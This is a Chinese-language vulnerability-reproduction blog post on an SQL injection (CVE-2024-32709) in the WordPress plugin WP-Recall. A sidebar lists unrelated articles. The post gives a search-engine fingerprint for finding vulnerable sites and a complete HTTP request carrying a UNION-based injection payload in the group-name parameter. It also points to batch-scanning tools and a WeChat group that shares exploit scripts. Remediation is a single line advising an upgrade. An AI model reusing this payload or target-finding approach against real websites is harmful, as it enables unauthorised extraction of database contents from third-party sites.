【漏洞复现】WordPress插件Recall CVE-2024-32709 SQL注入漏洞

0x01 产品简介

WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。

0x02 漏洞概述

其插件WP-Recall其插件存在account存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

0x03 搜索引擎

"/wp-content/plugins/wp-recall/"

在这里插入图片描述

0x04 漏洞复现

GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123123),0x7c),13--+- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

官方已更新补丁,请升级至最新版本。
官网地址:https://wordpress.com/zh-cn/

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-11 18:52:05       9 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-11 18:52:05       8 阅读
  3. 在Django里面运行非项目文件

    2024-07-11 18:52:05       8 阅读
  4. Python语言-面向对象

    2024-07-11 18:52:05       11 阅读

热门阅读

  1. 测试类型介绍-功能测试入门指南

    2024-07-11 18:52:05       10 阅读
  2. 【ARMv8/v9 GIC 系列 1.8 -- PE 中断处理的前期评估】

    2024-07-11 18:52:05       7 阅读
  3. VUE与React的生命周期对比

    2024-07-11 18:52:05       9 阅读
  4. 设计模式:建造者模式

    2024-07-11 18:52:05       8 阅读
  5. Puppeteer 生成图片 生成 PDF

    2024-07-11 18:52:05       6 阅读
  6. iOS开发新手教程:Swift语言与Xcode工具链

    2024-07-11 18:52:05       7 阅读
  7. 详解Redis:什么是Redis?

    2024-07-11 18:52:05       10 阅读
  8. 设计模式六大原则

    2024-07-11 18:52:05       7 阅读
  9. PG延迟模拟和查看

    2024-07-11 18:52:05       9 阅读
  10. el-date-picker 禁用 之前 和 之后 的时间

    2024-07-11 18:52:05       9 阅读
  11. 【66个开源+44个闭源Agent项目】

    2024-07-11 18:52:05       8 阅读
  12. 网络安全领域红蓝对抗里关于红队全方位解析

    2024-07-11 18:52:05       10 阅读
  13. GitHub Copilot & API

    2024-07-11 18:52:05       7 阅读